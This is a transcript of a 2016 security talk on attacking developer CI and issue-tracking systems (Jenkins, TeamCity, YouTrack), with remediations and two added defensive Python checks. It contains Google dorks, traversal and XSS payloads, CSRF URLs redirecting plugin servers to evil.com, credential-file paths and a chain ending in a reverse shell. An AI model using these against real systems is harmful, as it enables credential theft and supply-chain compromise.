
Simple bugs to pwn the devs

Andrey Plastunov
June 13, 2016


Transcript

  1. Agenda
     • Intro to Dev ecosystem
     • Why to attack?
     • Breaking in: Listing the targets
     • Breaking in: Attack scenarios
     • Useful Tools
     • Remediations (short)
  2. Why to attack?
     1. Directly affects the source code of your product
     2. Works with the developer's identity
     3. Can be a great help for an attacker during network infiltration
  3. Why to attack?
     ➢ The source code itself
       Can be stolen
       Can be modified (infected)
  4. Goodies: Source code. Why to attack? Real life example from some red team
     ➢ What do they have?
       1 target company
       1 unaware software vendor
  5. Why to attack? Real life example from some red team
     ➢ What do they want? Get access to the Target's network
  6. Why to attack? Real life example from some red team
     ➢ But...
       • Access the developers' VCS
       • Download the sources
       • Parse the sources for hardcoded values
       • Find passwords for the admin's endpoint
       • Access the endpoint and upload a shell
  7. Why to attack?
     ➢ The source code itself: can be stolen, can be modified (infected)
     ➢ Your identity (== signing key): signing malicious code with your keys
     ➢ Elevation of privilege: credentials (Domain, ssh, etc), code execution (== backend access)
  8. Breaking in. Table columns: Sources | Identity | Network creds | Backend. Cell values as extracted: + + + - + + - - + + +++ + +- - + -
     Actually, not in scope =)
  9. Breaking in
     IDEs · VCS · Issue tracker · Deployment server · CI system
     CI system: source code access, signing key access, access rights on all other components. That is our target.
  10. Goodies: Source code. A note on CI: Access level problems
      • Jenkins
        - No authentication enabled by default (Unauth)
        - No roles at all
      • TeamCity
        - Registration enabled by default (often with the “Project developer” role) (Open reg)
        - Guest login enabled by default (Guest)
      Google dork: intitle:“Dashboard [Jenkins]” intext:”Manage Jenkins”
      Google dork: intitle:“Projects - TeamCity”
      Google dork: intitle:“Register a New user Account - TeamCity”
  11. Goodies: Source code. A note on CI: UI problems
      • Weak protection against CSRF attacks (true for default or outdated instances)
      • A great number of vulnerabilities in the CI itself (and also in all those default plugins)
  12. Goodies: Source code. A note on CI: UI problems
      • Weak protection against CSRF attacks (true for default or outdated instances)
      • A great number of XSS vulnerabilities in the CI itself (and also in all those default plugins)
  15. Goodies: Source code. A note on CI: isolation problems
      • Any project can access (and modify) files of other projects on the same Agent
        - Jenkins agent working dir: ../workspace/
        - TeamCity agent working dir: ../../work/ (buildAgent/work/)
      • If Agent == Master: any project can access (and modify) the CI configuration itself
        - Jenkins configuration dir: $JENKINS_HOME/
        - TeamCity configuration dir: .BuildServer/config/
  16. Goodies: Source code. Breaking in: CI (if we have access to it. And we almost certainly have!)
      Project administrator role → Create project → Build project → Access to the build server’s OS
  17. Breaking in: CI (if we have access to it. And we almost certainly have!)
      • Client side vulnerabilities. Project administrator role
  18. Breaking in: CI (if we have access to it. And we almost certainly have!)
      • Client side vulnerabilities. Project administrator role
      Setup XSS payload → Plant XSS payload → …Phish a little... → PWN!
      Examples can be found here*: https://goo.gl/YUqHbk
      Flaws in Jenkins: https://goo.gl/XJZcBk
      For flaws in TeamCity you can see the release notes: https://goo.gl/pEcjJm
  19. Breaking in: CI (if we have local network access. TeamCity case)
      • Build Agent’s misuse (Agent == Master case). Project administrator role
  20. Breaking in: CI (if we have local network access. TeamCity case)
      TeamCity Agent Directory Traversal in XML-RPC API
      Function: <Censored until Security update>
      Payload example: #logs/../../../../../../../etc/passwd
  21. Breaking in: CI (if we have local network access. TeamCity case)
      • Build Agent’s misuse (Agent == Master case). Project administrator role
        Hint1: Default Build Agent == Master Server
        Hint2: Master stores its super admin password in: ./logs/teamcity-server.log
        Hint3: by default the agent listens on 0.0.0.0
        Hint4: Agent's default listening port is 9090
      Send a crafted XML-RPC payload to Agent* → Perform MitM attack on agent and Master → We gain super administrator role
  22. Breaking in: CI (if we have local network access. TeamCity case)
      • Build Agent’s misuse (Agent == Master case). Project administrator role
        Hint1: Default Build Agent == Master Server
        Hint2: Master stores its super admin password in file ./logs/teamcity-server.log
        Hint3: by default the agent listens on 0.0.0.0
        Hint4: Agent's default listening port is 9090
      Send a crafted XML-RPC payload to Agent* → Perform MitM attack on agent and Master → We gain super administrator role
  23. Breaking in: CI (if we have local network access. TeamCity case). Useful paths for credential gathering
      Project administrator role
      • Jenkins
        • Build logs
  24. Breaking in: CI. Useful paths for credential gathering. Project administrator role
      • Jenkins
        • Build logs
        • Passwords: ./jobs/<project_name>/config.xml
        • Project’s keystore: ./workspace/<project_name>/<keystore_name>/ (often but not always)
      • TeamCity
        • Internal HSQLDB: .BuildServer/system/buildserver.data
        • Project’s VCS config: .BuildServer/config/projects/<project name>/vcsRoots
        • Project’s ssh keys: .BuildServer/config/projects/<project name>/ssh_keys
  25. Breaking in: CI (if we have access to it. And we almost certainly have!)
      • Plugins misuse. Project administrator role
  26. Breaking in: CI (if we have access to it. And we almost certainly have!)
      • Plugins misuse (Jenkins case). Project administrator role
      • Modify configuration via CSRF (or XSS)
      Setting up an evil plugin server via the CSRF vulnerability:
      /pluginManager/siteConfigure?site=http%3A%2F%2Fwww.evil.com&.crumb=&json=%7B%22site%22%3A+%22http%3A%2F%2Fwww.evil.com%22%2C+%22crumb%22%3A+%22%22%7D&Submit=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C
  27. Breaking in: CI (if we have access to it. And we almost certainly have!)
      • Plugins misuse (Jenkins case). Project administrator role
      • Modify configuration via CSRF (or XSS)
      Setting up an evil host as proxy for the plugin server via the CSRF vulnerability:
      /pluginManager/proxyConfigure?_.name=192.168.1.26&_.port=54321&_.userName=&_.password=&_.noProxyHost=&_.testUrl=http%3A%2F%2Fwww.ya.ru&.crumb=&json=%7B%22name%22%3A+%22192.168.1.26%22%2C+%22port%22%3A+%2254321%22%2C+%22userName%22%3A+%22%22%2C+%22password%22%3A+%22%22%2C+%22noProxyHost%22%3A+%22%22%2C+%22testUrl%22%3A+%22http%3A%2F%2Fwww.ya.ru%22%2C+%22crumb%22%3A+%22%22%7D&Submit=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C
  28. Breaking in: CI (if we have access to it. And we almost certainly have!)
      • Plugins misuse (Jenkins case). Project administrator role
      Setup malicious plugin server → Exploit client-side vulnerability → PWN via UI + plugin description
      For Jenkins you could use: Juseppe (https://goo.gl/fiLZc9)
  29. Breaking in: CI (if we have access to it. And we almost certainly have!)
      • Plugins misuse (Jenkins case). Project administrator role
      Setup malicious plugin server → Exploit client-side vulnerability → PWN via UI + plugin description
      Setup malicious plugin server → PWN via the plugin itself
      For Jenkins you could use: Juseppe (https://goo.gl/fiLZc9)
  30. Goodies: Source code. Breaking in: issue tracking (if we do not have access to CI)
      Administrative privileges → Access to credentials storage → Extracting CI credentials → Access to CI
  31. Breaking in: issue tracking (if we do not have access to CI)
      • Client side vulnerabilities. Administrative privileges
  32. Breaking in: issue tracking (if we do not have access to CI)
      YouTrack stored XSS
      Function: Upload attachment to Issue
      Payload example:
        Content-type: application/xml
        <?xml version="1.0" encoding="UTF-8"?>
        <Query>
          <SearchTerm>
            <script xmlns="http://www.w3.org/1999/xhtml">alert('Hello');</script>
          </SearchTerm>
        </Query>
  33. Breaking in: issue tracking (if we do not have access to CI)
      • Server side vulnerabilities. Access to credentials storage
  34. Breaking in: issue tracking (if we do not have access to CI)
      YouTrack Directory Traversal
      Prerequisite: set the backup dir to any value you want on the target OS (admin privs required)
      Function: admin/databaseBackup + backupFile
      Payload example: /backupFile/passwd
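The defender's side of the traversal cases on slides 15, 20 and 34: a path-confinement check that rejects any caller-supplied path escaping its base directory, plus a second stage for an administrator-configurable directory (the backup-dir case), where the configured directory itself must lie under an allowed root. This is an added example, not code from the talk or from TeamCity/YouTrack; the directory names and file names are constructed.

```python
import posixpath


class PathEscapeError(ValueError):
    """A caller-supplied path would resolve outside the directory it must stay in."""


def is_inside(base_dir: str, path: str) -> bool:
    """True if the normalised absolute path lies under the normalised base_dir."""
    base = posixpath.normpath(base_dir)
    target = posixpath.normpath(path)
    # commonpath compares whole components, so /var/x does not match /var/x2
    return posixpath.commonpath([base, target]) == base


def resolve_confined(base_dir: str, user_path: str) -> str:
    """Join user_path onto base_dir and refuse any result that leaves base_dir.

    POSIX semantics are used deliberately so the check behaves the same on every
    host. Normalisation runs after the join, so '..' segments, doubled slashes and
    odd leading components such as '#logs' cannot step out of the base. A leading
    '/' in the user-controlled part must not reset the path to the filesystem root.
    """
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, user_path.lstrip("/")))
    if not is_inside(base, candidate):
        raise PathEscapeError(f"{user_path!r} resolves to {candidate}, outside {base}")
    return candidate


def served_backup_path(allowed_root: str, configured_dir: str, file_name: str) -> str:
    """Two-stage check for an admin-configurable directory (the YouTrack backup case).

    The configured directory must itself sit under allowed_root; otherwise an
    admin-level setting turns 'download a backup' into a read of any file on the
    host. Only then is the requested file confined to that directory.
    """
    if not is_inside(allowed_root, configured_dir):
        raise PathEscapeError(f"backup dir {configured_dir!r} is outside {allowed_root}")
    return resolve_confined(configured_dir, file_name)


if __name__ == "__main__":
    # Constructed inputs: an agent log directory and the traversal payload from slide 20.
    agent_logs = "/opt/teamcity/buildAgent/logs"
    print(resolve_confined(agent_logs, "teamcity-agent.log"))
    for bad in ("#logs/../../../../../../../etc/passwd", "../../work/other-project/secret.key"):
        try:
            resolve_confined(agent_logs, bad)
        except PathEscapeError as err:
            print("rejected:", err)
```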
  35. Goodies: Source code. Breaking in: issue tracking (if we do not have access to CI)
      Client side vulnerability (e.g. XSS) → Administrative privileges → Server side vulnerability (e.g. Directory Traversal) → Tracker’s OS access → CI credential access (based on YouTrack’s capabilities)
      For YouTrack, various configuration properties (including credentials) can be found at: ~/teamsysdata/youtrack/00000000000.xd
  36. Breaking in: All together. Short summary of the video:
      1. Upload an XSS with a payload to download the YouTrack credentials to our host
      2. Exploit the XSS against an administrator
      3. Parse the file on our host and find the TeamCity record
      4. Use the TeamCity credentials to upload a shell on TeamCity - I created a small tool to perform the task. It will be available on my github
      5. Get the reverse shell to your host ...
      6. Profit
  37. Goodies: Source code. Useful tips and tools:
      • Exploiting TeamCity account creation (if it is disabled at first look): https://beyondbinary.io/articles/teamcity-account-creation
      • Retrieving the encryption key via the admin script console in Jenkins: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html
      • What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability. https://goo.gl/K6CiIE
      • Serialization Must Die: Act 2: XStream https://goo.gl/9c68jD
      • My github (in a couple of weeks ^_^): https://github.com/osakaaa/CI_tools
  38. Remediations. Summary
      ➢ Never rely on default settings
      ➢ Never bind to 0.0.0.0
      ➢ Never rely on the safety of 3rd party components like plugins
      ➢ Update your tools as soon as a new security advisory is published
      ➢ Perform additional validation on all user inputs (including sources)
      ➢ Try to isolate projects (Docker?)
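A configuration audit for the Jenkins defaults called out on slides 10 and 11 (no authentication, no roles, open registration, weak CSRF protection) and the first remediation above. This is an added example, not code from the talk or from Jenkins; it assumes the element names Jenkins writes to $JENKINS_HOME/config.xml (useSecurity, authorizationStrategy, securityRealm/disableSignup, crumbIssuer), and both config samples are constructed.

```python
import xml.etree.ElementTree as ET

# Constructed sample of a $JENKINS_HOME/config.xml left on the defaults the talk
# describes: no authentication, no roles, open sign-up and no CSRF crumbs.
WEAK_CONFIG_XML = """<hudson>
  <useSecurity>false</useSecurity>
  <authorizationStrategy class="hudson.security.AuthorizationStrategy$Unsecured"/>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>false</disableSignup>
  </securityRealm>
</hudson>
"""

# Constructed sample of the same file after the remediations are applied.
HARDENED_CONFIG_XML = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy"/>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>true</disableSignup>
  </securityRealm>
  <crumbIssuer class="hudson.security.csrf.DefaultCrumbIssuer"/>
</hudson>
"""


def audit_jenkins_config(config_xml: str) -> list:
    """Return one finding per weak default found in a Jenkins config.xml document."""
    root = ET.fromstring(config_xml)

    def text(path):  # lower-cased text of a child element, or None if absent
        el = root.find(path)
        return el.text.strip().lower() if el is not None and el.text else None

    def klass(path):  # value of the element's class attribute, or "" if absent
        el = root.find(path)
        return el.get("class", "") if el is not None else ""

    findings = []
    if text("useSecurity") != "true":
        findings.append("useSecurity is not true: no authentication, every visitor is an admin")
    if klass("authorizationStrategy").endswith("$Unsecured"):
        findings.append("authorizationStrategy is Unsecured: no roles at all")
    if klass("securityRealm").endswith("HudsonPrivateSecurityRealm") and text("securityRealm/disableSignup") != "true":
        findings.append("disableSignup is not true: self-registration is open")
    if root.find("crumbIssuer") is None:
        findings.append("no crumbIssuer configured: CSRF protection is off")
    return findings
```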